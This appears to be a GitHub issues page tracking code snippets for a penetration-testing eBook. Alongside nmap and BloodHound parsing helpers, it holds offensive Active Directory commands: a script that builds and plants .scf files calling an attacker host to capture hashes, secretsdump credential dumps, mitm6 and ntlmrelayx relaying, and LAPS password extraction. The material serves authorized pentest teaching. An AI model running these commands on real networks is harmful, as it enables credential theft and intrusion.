7minsec / ebook
A place to track code snippets (as well as future enhancements and typo fixes!) in 7MinSec's Light Pentest LITE eBook
I think it would be something like this:
grep -B 9 VULNERABLE: st-vuln2-eblue.nmap | grep -i "nmap scan report for" | awk '{print $5}'
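Added here as an example, not code from the eBook: the `grep -B 9` approach above depends on the VULNERABLE line always sitting exactly nine lines under the host header, which varies between NSE scripts. This POSIX shell/awk version instead remembers the most recent "Nmap scan report for" header and prints that host's IP (taken from the parentheses when nmap printed a hostname) the first time a "State: VULNERABLE" or "State: LIKELY VULNERABLE" line appears. The report below is a constructed sample standing in for st-vuln2-eblue.nmap.

```shell
#!/bin/sh
# Added example (not from the LPLITE eBook): list hosts flagged VULNERABLE in a
# normal nmap report (.nmap) by tracking the current host header instead of
# relying on a fixed grep -B offset.

# Constructed sample report: three hosts, two flagged by smb-vuln-ms17-010.
sample_nmap() {
  cat <<'EOF'
Nmap scan report for 10.0.7.100
Host is up (0.00050s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_    Risk factor: HIGH

Nmap scan report for fs01.pwn.town (10.0.7.101)
Host is up (0.00040s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|_    Risk factor: HIGH

Nmap scan report for dc01.pwn.town (10.0.7.102)
Host is up (0.00030s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms08-067:
|   State: NOT VULNERABLE
|_
EOF
}

# vulnerable_hosts [file]  -> one IP per flagged host, sorted and de-duplicated.
# Reads the .nmap file given as $1, or stdin when no argument is given.
vulnerable_hosts() {
  awk '
    /^Nmap scan report for / {
      # "Nmap scan report for 10.0.7.100" or "Nmap scan report for name (10.0.7.101)"
      ip = $5
      if ($NF ~ /^\(.*\)$/) { ip = $NF; gsub(/[()]/, "", ip) }
      printed = 0
    }
    # "State: NOT VULNERABLE" does not match; "LIKELY VULNERABLE" does.
    /State: (LIKELY )?VULNERABLE/ && !printed { print ip; printed = 1 }
  ' "${1:--}" | sort -u
}

# Usage against a real scan: vulnerable_hosts st-vuln2-eblue.nmap
sample_nmap | vulnerable_hosts
```

The sample run prints 10.0.7.100 and 10.0.7.101 and skips dc01, whose only finding is NOT VULNERABLE.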
When you need to export a big list of systems (such as those you have admin access over) from BloodHound, you get a big .json file with a bunch of extra data in it. It can help to use some cat action to slim that down:
cat export-from-bloodhound.json | jq '.nodes[].label' | tr -d '"' | sort
And to remove @domain.com:
cat export-from-bloodhound.json | jq '.nodes[].label' | tr -d '"' | awk -F'@' '{print $1}' | sort
Take all the context here and bake it in: https://7ms.us/7ms-567-how-to-build-an-intentionally-vulnerable-sql-server/
This looks awesome, test in lab:
Teach folks how to use one of these files like:
[Shell]
Command=2
IconFile=\\your.attacking.box.ip\icon.ico
[Taskbar]
Command=ToggleDesktop
If you can't browse directly to the shares you want to drop .scf files at, use Kali's built-in smbclient tool to do the job:
smbclient \\\\the.ip.of.server\\sharename -U samplecompany/billybob
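Added here as an example, not code from the eBook: a small POSIX shell helper that writes the .scf shown above with CRLF line endings (as a Windows-authored file would have) and stages one smbclient put per share from a list, for the case where you cannot browse to the shares directly. The attacker IP 10.0.7.50, the share list and pwn.town/billybob are placeholders; have Responder or ntlmrelayx listening on the IconFile host before dropping the files. The remote name gets a leading @ so the file sorts to the top of the listing, which is where Explorer renders icons first.

```shell
#!/bin/sh
# Added example (not from the LPLITE eBook): build the SCF payload and stage
# smbclient "put" commands for a list of shares.

# make_scf <attacker_ip> <outfile>
# printf turns "\\\\" into "\\" and "\\" into "\", so the IconFile line reads
# IconFile=\\<ip>\icon.ico; "\r\n" gives Windows line endings.
make_scf() {
  printf '[Shell]\r\nCommand=2\r\nIconFile=\\\\%s\\icon.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n' "$1" > "$2"
}

# scf_put_cmd <scf_file> <//server/share> <domain/user>
# -c runs the quoted smbclient command non-interactively; "put local remote"
# uploads the file under the @-prefixed remote name. Append %password to the
# -U value to avoid the prompt when scripting many shares.
scf_put_cmd() {
  printf 'smbclient %s -U %s -c "put %s @%s"\n' "$2" "$3" "$1" "$(basename "$1")"
}

# stage_scf_drops <scf_file> <share_list_file> <domain/user>
# Prints one command per non-empty, non-comment line of the share list so you
# can review them before piping the output to sh.
stage_scf_drops() {
  while IFS= read -r share; do
    case "$share" in ''|'#'*) continue ;; esac
    scf_put_cmd "$1" "$share" "$3"
  done < "$2"
}

# Demo with placeholder values (constructed, not a real engagement):
demo_dir="${TMPDIR:-/tmp}"
make_scf 10.0.7.50 "$demo_dir/lplite.scf"
printf '# shares found with PowerHuntShares or smbmap\n//10.0.7.20/Public\n//10.0.7.21/Scans\n' > "$demo_dir/shares.txt"
stage_scf_drops "$demo_dir/lplite.scf" "$demo_dir/shares.txt" pwn.town/billybob
```

Review the printed commands, then run them with `stage_scf_drops ... | sh` once the listener is up.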
Offline dump:
secretsdump.py -ntds "Active Directory/ntds.dit" -system registry/SYSTEM LOCAL -outputfile loot/bigdump
Secretsdump from a local machine:
python3 secretsdump.py test.local/john:[email protected]
Spin up a loot share
smbserver.py share2 /share -smb2support
Kick things off with mitm6
sudo python3 /opt/mitm6/mitm6/mitm6.py -i eth0 -d pwn.town --no-ra --ignore-nofqdn
Get the relay going:
sudo python3 /opt/impacket/examples/ntlmrelayx.py -6 -wh doesntexist -t ldaps://10.0.7.100 -smb2support --delegate-access
In the cme.conf file you can change from Pwn3d to something else
Maybe stick it in the footer so it's easily visible?
Find vulns with Certify, certipy, certi.
And maybe talk about tools to find/remediate these vulns, like the SpecterOps stuff and https://github.com/TrimarcJake/Locksmith
(tied to 7MinSec/LPLITE#24)
getST.py -spn cifs/somedc.domain.com domain.com/user -dc-ip ip.of.some.dc
^^^ this might not work?
getTGT.py 'contoso.local/Anakin:Vader1234!'
export KRB5CCNAME=user.ccache
secretsdump.py -debug -k FQDN.OF.SOMEBOX
But this does?
secretsdump.py domain.com/user@somebox
Some folks have reported the PDF is a bit hard to copy and paste from. Would be helpful to host some code snippets directly from here.
This is awesome: https://github.com/NetSPI/PowerHuntShares
Write about it in the book. kthxbye.
These DPAT resources are awesome:
This bit of code helped me parse out all the groups:
Get-AdGroup -Filter * | % { Get-AdGroupMember $_.Name | Select-Object -ExpandProperty SamAccountName | Out-File -FilePath "$($_.Name).txt" -Encoding ASCII }
Pull in some mimikatz tips like you do in LPLITE lab. (i.e. PS remote session, turn off Defender, make a dump file). Maybe mention the many ways to do mimikatz'ing:
It's good!
$filePath = "hosts.txt"
$exportPath = "output.csv"
$hostnames = Get-Content $filePath
$table = @()
foreach ($hostname in $hostnames) {
    try {
        # A name can resolve to several addresses; join them so Export-Csv
        # writes the list instead of "System.Object[]".
        $ipAddress = ([System.Net.Dns]::GetHostAddresses($hostname) |
            Select-Object -ExpandProperty IPAddressToString) -join ';'
        $table += [PSCustomObject]@{
            Hostname  = $hostname
            IPAddress = $ipAddress
        }
    }
    catch {
        # Unresolvable name (NXDOMAIN, timeout): record it instead of dropping it
        $table += [PSCustomObject]@{
            Hostname  = $hostname
            IPAddress = 'N/A'
        }
    }
}
# Sort the table by IP address (string sort, so 10.0.7.9 lands after 10.0.7.10)
$table = $table | Sort-Object IPAddress
# Export the sorted table to CSV
$table | Export-Csv -Path $exportPath -NoTypeInformation
A nice nugget from a reader:
Get-ADUser -filter {enabled -eq $true} -Properties * | ForEach-Object{$_.psobject.properties| Where-Object {($_.Name -notmatch "MemberOf|PropertyNames") -and ($_.Value -like "*passw*")}}|Select-Object baseobject,name,value|sort-object baseobject | export-csv users.csv
Need to test this in the lab first.
This snippet helps:
cat st-all.gnmap | grep -i "623/open" | awk '/open/{print $3}' | tr -d '()' | sort > 623-maybe-open.txt
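Added here as an example, not code from the eBook: a POSIX shell/awk parser for the .gnmap Ports: field that keeps the IP, the hostname (or "-" when nmap wrote an empty "()") and the port state. A plain `grep "623/open"` also matches "623/open|filtered", which is what UDP scans report for most hosts, so the state is printed separately and a second function narrows the list to ports nmap confirmed open. The .gnmap lines are a constructed sample standing in for st-all.gnmap.

```shell
#!/bin/sh
# Added example (not from the LPLITE eBook): parse greppable nmap output for a
# given port and tell "open" apart from "open|filtered".

# Constructed .gnmap lines (fields are tab-separated, as nmap writes them).
sample_gnmap() {
  printf '# Nmap 7.94 scan initiated (constructed sample)\n'
  printf 'Host: 10.0.7.5 ()\tStatus: Up\n'
  printf 'Host: 10.0.7.5 ()\tPorts: 623/open/udp//asf-rmcp///\tIgnored State: closed (999)\n'
  printf 'Host: 10.0.7.6 (bmc01.pwn.town)\tPorts: 161/open/udp//snmp///, 623/open|filtered/udp//asf-rmcp///\n'
  printf 'Host: 10.0.7.7 (fs01.pwn.town)\tPorts: 445/open/tcp//microsoft-ds///\n'
  printf '# Nmap done (constructed sample)\n'
}

# gnmap_port_state <port> [file]  -> "<ip> <hostname|-> <state>" per host listing the port.
# Reads the .gnmap file given as $2, or stdin when omitted.
gnmap_port_state() {
  awk -F'\t' -v port="$1" '
    /^Host: / {
      split($1, h, " ")              # h[2] = IP, h[3] = "(hostname)" or "()"
      ip = h[2]; host = h[3]
      gsub(/[()]/, "", host)
      if (host == "") host = "-"
      for (i = 2; i <= NF; i++) {
        if ($i !~ /^Ports: /) continue
        sub(/^Ports: /, "", $i)
        n = split($i, ports, /, */)   # one "port/state/proto//service///" per entry
        for (j = 1; j <= n; j++) {
          split(ports[j], f, "/")    # f[1] = port, f[2] = state, f[3] = proto
          if (f[1] == port) print ip, host, f[2]
        }
      }
    }' "${2:--}"
}

# open_hosts <port> [file]  -> IPs where nmap reported the port as plain "open".
open_hosts() {
  gnmap_port_state "$1" "${2:--}" | awk '$3 == "open" { print $1 }'
}

# Usage against a real scan: gnmap_port_state 623 st-all.gnmap
sample_gnmap | gnmap_port_state 623
```

On the sample this lists 10.0.7.5 as open and bmc01.pwn.town as open|filtered; `open_hosts 623` returns only 10.0.7.5.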
Query to find all LAPS passwords:
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -Properties 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime' | select dnshostname,ms-mcs-admpwd
Yeah that's a good idea.